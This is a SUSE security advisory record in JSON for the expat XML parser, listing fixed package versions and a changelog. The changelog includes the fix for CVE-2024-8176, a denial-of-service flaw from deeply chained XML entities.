{"affected":[{"ecosystem_specific":{"binaries":[{"expat":"2.7.1-150700.3.3.1","libexpat-devel":"2.7.1-150700.3.3.1","libexpat1":"2.7.1-150700.3.3.1","libexpat1-32bit":"2.7.1-150700.3.3.1"}]},"package":{"ecosystem":"SUSE:Linux Enterprise Module for Basesystem 15 SP7","name":"expat","purl":"pkg:rpm/suse/expat&distro=SUSE%20Linux%20Enterprise%20Module%20for%20Basesystem%2015%20SP7"},"ranges":[{"events":[{"introduced":"0"},{"fixed":"2.7.1-150700.3.3.1"}],"type":"ECOSYSTEM"}]}],"aliases":[],"details":"This update for expat fixes the following issues:\n\nexpat was updated to version 2.7.1:\n\n  -  Bug fixes:\n\n       - Restore event pointer behavior from Expat 2.6.4\n        (that the fix to CVE-2024-8176 changed in 2.7.0);\n        affected API functions are:\n\n                    - XML_GetCurrentByteCount\n                    - XML_GetCurrentByteIndex\n                    - XML_GetCurrentColumnNumber\n                    - XML_GetCurrentLineNumber\n                    - XML_GetInputContext\n  -  Other changes:\n\n       - Fix printf format specifiers for 32bit Emscripten\n       - docs: Promote OpenSSF Best Practices self-certification\n       - tests/benchmark: Resolve mistaken double close\n       - Address compiler warnings\n       - Version info bumped from 11:1:10 (libexpat*.so.1.10.1)\n         to 11:2:10 (libexpat*.so.1.10.2); see https://verbump.de/\n         for what these numbers do\n\nVersion update to 2.7.0 (CVE-2024-8176, bsc#1239618, jsc#PED-12507)\n\n* Security fixes:\n\n- CVE-2024-8176 -- Fix crash from chaining a large number of\n  entities caused by stack overflow by resolving use of recursion,\n  for all three uses of entities: - general entities in character data\n  ('<e>&g1;</e>') - general entities in attribute values\n  ('<e k1='&g1;'/>') - parameter entities ('%p1;')\n\n  Known impact is (reliable and easy) denial of service:\n  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:H/RL:O/RC:C\n  (Base Score: 7.5, Temporal Score: 7.2)\n  Please note that a layer of compression around XML can\n  significantly reduce the minimum attack payload size.\n\n* Other changes:\n  - docs: Add missing documentation of error code XML_ERROR_NOT_STARTED\n    that was introduced with 2.6.4\n  - docs: Document need for C++11 compiler for use from C++\n  - Address Cppcheck warnings\n  - Mass-migrate links from http:// to https://\n\n  - Document changes since the previous release\n  - Version info bumped from 11:0:10 (libexpat*.so.1.10.0)\n    to 11:1:10 (libexpat*.so.1.10.1); see https://verbump.de/\n    for what these numbers do\n","id":"SUSE-SU-2025:03239-1","modified":"2025-09-16T17:04:04Z","published":"2025-09-16T17:04:04Z","references":[{"type":"ADVISORY","url":"https://www.suse.com/support/update/announcement/2025/suse-su-202503239-1/"},{"type":"REPORT","url":"https://bugzilla.suse.com/1239618"},{"type":"WEB","url":"https://www.suse.com/security/cve/CVE-2024-8176"}],"related":["CVE-2024-8176"],"summary":"Security update for expat","upstream":["CVE-2024-8176"]}